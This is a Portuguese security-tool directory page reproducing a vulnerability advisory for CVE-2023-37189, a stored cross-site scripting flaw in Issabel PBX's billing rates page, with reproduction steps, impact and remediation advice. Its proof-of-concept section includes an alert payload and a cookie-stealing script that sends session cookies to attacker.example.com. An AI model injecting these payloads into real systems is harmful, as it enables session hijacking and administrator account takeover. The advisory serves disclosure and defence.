Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/sahiloj/cve-2023-37189
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubsahiloj/cve-2023-37189

CVE-2023-37189

Existe uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado no Issabel PBX versão 4.0.0-6, na página de gerenciamento de Billing Rates (index.php?menu=billing_rates).

Ver Repositório
111há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-37189 — Issabel PBX 4.0.0-6 Cross-Site Scripting (XSS) Armazenado

CVE Severity Type Vendor


Visão Geral

CampoDetalhes
ID CVECVE-2023-37189
VulnerabilidadeCross-Site Scripting (XSS) Armazenado
Produto AfetadoIssabel PBX 4.0.0-6
URL Afetadaindex.php?menu=billing_rates
Campos VulneráveisCampos Name e Prefix no módulo Criar Nova Tarifa
SeveridadeMédia (Pontuação Base CVSS 3.1: 6.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
Data do Relatório07 de julho de 2023
Descoberto PorSahil Ojha
Testado EmWindows
Site do Fornecedorhttps://www.issabel.org/
Código-Fonte do Softwarehttps://github.com/IssabelFoundation/issabelPBX

Descrição

Existe uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado no Issabel PBX versão 4.0.0-6 na página de gerenciamento de tarifas de cobrança (index.php?menu=billing_rates).

O Issabel PBX é uma plataforma de comunicações unificadas de código aberto amplamente utilizada, construída sobre FreePBX/Asterisk. Seu recurso Cobrança → Tarifas permite que administradores definam entradas de tarifas de chamadas com um Nome e um Prefixo personalizados. Devido à sanitização insuficiente de entrada e à falta de codificação de saída, um usuário autenticado pode injetar HTML ou JavaScript arbitrário em qualquer um dos campos. O script malicioso é então armazenado de forma persistente no banco de dados da aplicação e executado automaticamente no navegador de qualquer usuário que posteriormente visite a página de Tarifas — incluindo outros administradores — sem qualquer interação adicional.

Essa classe de vulnerabilidade é particularmente perigosa em painéis administrativos porque:

  • Pode ser usada para sequestrar cookies de sessão de outros administradores, resultando na tomada total da conta.
  • Possibilita ataques de phishing ao modificar a aparência da página exibida às vítimas.
  • Pode facilitar o roubo de tokens CSRF, o registro de teclas (keylogging) ou o redirecionamento para sites maliciosos.
  • O payload persiste até ser explicitamente removido, podendo afetar um número ilimitado de vítimas ao longo do tempo.

Detalhes da Vulnerabilidade

  • Classe de Vulnerabilidade: Cross-Site Scripting (XSS) Armazenado (Persistente) (CWE-79)
  • Vetor de Ataque: Rede
  • Autenticação Necessária: Sim (usuário autenticado de baixo privilégio ou conta de administrador)
  • Interação do Usuário: Necessária (a vítima deve visitar a página de Tarifas de Cobrança)
  • Escopo: Alterado (o atacante pode impactar as sessões de navegador de outros usuários)
  • Causa Raiz: Ausência de codificação HTML / sanitização de saída nos campos Name e Prefix ao renderizar valores armazenados de volta à página.

Prova de Conceito

Os seguintes payloads, quando inseridos no campo Nome ou Prefixo do formulário Criar Nova Tarifa, demonstram a vulnerabilidade:

Alerta básico (verificação de funcionamento):

root@kitploit:~
<script>alert('XSS')</script>

Roubo de cookie de sessão (substitua attacker.example.com por um servidor seu e autorizado — nunca ataque usuários ou sistemas reais):

root@kitploit:~
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

Payload de onerror baseado em imagem (evasão de WAF):

root@kitploit:~

⚠️ Nota: Estes payloads são fornecidos estritamente para fins educacionais e de pesquisa em segurança. Sempre obtenha autorização formal por escrito antes de testar em qualquer sistema que você não possua.


Passos para Reproduzir

  1. Faça login na interface web do Issabel PBX usando uma conta de administrador.

  2. Navegue até Relatórios → Cobrança → Tarifas (URL: index.php?menu=billing_rates).

  3. Clique em "Criar Nova Tarifa" e insira um payload XSS elaborado no campo Prefixo ou Nome.

    Etapa 2 – Injetando o payload nos campos Nome/Prefixo

  4. Clique em Salvar. O payload agora está armazenado no banco de dados.

  5. Qualquer usuário (incluindo outros administradores) que visitar a página de Tarifas de Cobrança terá o script executado automaticamente em seu navegador.

    Etapa 3 – O payload é executado ao carregar a página

    Etapa 3 – Cookie de sessão capturado


Impacto

  • Sequestro de Sessão: Atacantes podem roubar cookies de sessão e se passar por outros usuários ou administradores.
  • Escalação de Privilégios: Ao sequestrar uma sessão de administrador, um atacante com privilégios menores pode obter controle administrativo total.
  • Exfiltração de Dados: Informações confidenciais visíveis na página podem ser exfiltradas silenciosamente.
  • Backdoor Persistente: O payload permanece ativo até ser removido manualmente, tornando essa uma ameaça persistente.

Mitigação / Remediação

Recomenda-se ao fornecedor e aos administradores de sistemas aplicar as seguintes contramedidas:

  1. Codificação de Saída: Aplique codificação HTML sensível ao contexto ao renderizar valores armazenados de volta à página HTML (por exemplo, use htmlspecialchars() no PHP com ENT_QUOTES). Esta é a principal e mais confiável defesa contra XSS.
  2. Validação de Entrada: Como medida complementar de defesa em profundidade, rejeite ou sanitize a entrada fornecida pelo usuário no lado do servidor. Remova ou codifique caracteres HTML especiais (<, >, ", ', &) antes de armazenar os dados. Observe que apenas a validação de entrada pode ser contornada e não deve ser usada como controle exclusivo.
  3. Política de Segurança de Conteúdo (CSP): Implante um cabeçalho HTTP estrito de Content-Security-Policy para restringir a execução de scripts inline.
  4. Web Application Firewall (WAF): Use um WAF com regras de detecção de XSS como medida de defesa em profundidade.
  5. Auditorias Regulares de Segurança: Realize revisões de código e testes de penetração periódicos em todos os campos de entrada controlados pelo usuário.

Referências

  • NVD – CVE-2023-37189
  • MITRE CVE – CVE-2023-37189
  • OWASP: Cross-Site Scripting (XSS)
  • CWE-79: Neutralização Incorreta de Entrada Durante a Geração de Página Web
  • Issabel PBX – Site Oficial
  • IssabelFoundation/issabelPBX – GitHub

Aviso Legal

Este repositório e as informações aqui contidas são fornecidos exclusivamente para fins educacionais e de pesquisa em segurança. O autor não é responsável por qualquer uso indevido ou dano causado pelas informações fornecidas. Sempre obtenha permissão explícita por escrito do proprietário do sistema antes de realizar qualquer teste de segurança.


Descoberto e divulgado por Sahil Ojha

Baixar ferramenta